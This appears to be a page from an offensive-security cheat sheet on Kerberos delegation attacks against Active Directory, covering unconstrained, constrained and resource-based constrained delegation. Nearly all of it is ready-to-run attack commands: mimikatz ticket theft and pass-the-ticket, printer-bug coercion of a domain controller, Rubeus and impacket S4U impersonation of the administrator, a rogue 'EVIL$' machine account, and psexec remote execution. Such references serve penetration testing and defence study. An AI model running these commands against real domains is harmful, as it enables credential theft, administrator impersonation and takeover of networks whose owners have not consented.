> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Delegation Attacks

> Kerberos delegation attacks: unconstrained, constrained, and resource-based constrained delegation (RBCD).

## Unconstrained Delegation

Host with unconstrained delegation stores TGTs of connecting users. Compromise host → steal TGTs.

### Find

```powershell theme={"dark"}
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
Get-DomainComputer -Unconstrained
```

```bash theme={"dark"}
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" -D "user@domain.local" -w 'pass' "(userAccountControl:1.2.840.113556.1.4.803:=524288)" sAMAccountName
```

### Exploit

```cmd theme={"dark"}
# On compromised host with unconstrained delegation
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt ticket.kirbi
```

### Printer Bug (Coerce DC)

Force DC to auth to unconstrained delegation host:

```powershell theme={"dark"}
.\SpoolSample.exe DC_HOSTNAME COMPROMISED_HOSTNAME
```

```cmd theme={"dark"}
# Catch TGT
mimikatz # sekurlsa::tickets /export
# Use DC TGT for DCSync
```

***

## Constrained Delegation

Account can impersonate users to specific services only.

### Find

```powershell theme={"dark"}
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
```

```bash theme={"dark"}
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(msDS-AllowedToDelegateTo=*)" sAMAccountName msDS-AllowedToDelegateTo
```

### Exploit — Rubeus

```powershell theme={"dark"}
.\Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt
```

### Exploit — Impacket

```bash theme={"dark"}
impacket-getST -spn cifs/target.domain.local -impersonate administrator DOMAIN/svc_account:password -dc-ip DC_IP
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@target.domain.local -k -no-pass
```

### With Hash

```bash theme={"dark"}
impacket-getST -spn cifs/target.domain.local -impersonate administrator DOMAIN/svc_account -hashes :NTLM_HASH -dc-ip DC_IP
```

***

## Resource-Based Constrained Delegation (RBCD)

Write `msDS-AllowedToActOnBehalfOfOtherIdentity` on target machine. Need: write access to target computer object + ability to create machine account.

### Check MAQ (Machine Account Quota)

```bash theme={"dark"}
crackmapexec ldap DC_IP -u user -p pass -M maq
```

### Create Machine Account

```bash theme={"dark"}
impacket-addcomputer DOMAIN/user:password -computer-name 'EVIL$' -computer-pass 'Password123' -dc-ip DC_IP
```

### Set Delegation

```bash theme={"dark"}
impacket-rbcd DOMAIN/user:password -delegate-from 'EVIL$' -delegate-to 'TARGET$' -dc-ip DC_IP -action write
```

### Get Ticket

```bash theme={"dark"}
impacket-getST -spn cifs/target.domain.local -impersonate administrator DOMAIN/'EVIL$':'Password123' -dc-ip DC_IP
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@target -k -no-pass
```

***

## Quick Reference

| Type          | Find                       | Exploit                       |
| ------------- | -------------------------- | ----------------------------- |
| Unconstrained | `TrustedForDelegation`     | Steal TGTs from memory        |
| Constrained   | `msDS-AllowedToDelegateTo` | S4U2Self + S4U2Proxy          |
| RBCD          | Write to computer object   | Create machine + rbcd + getST |
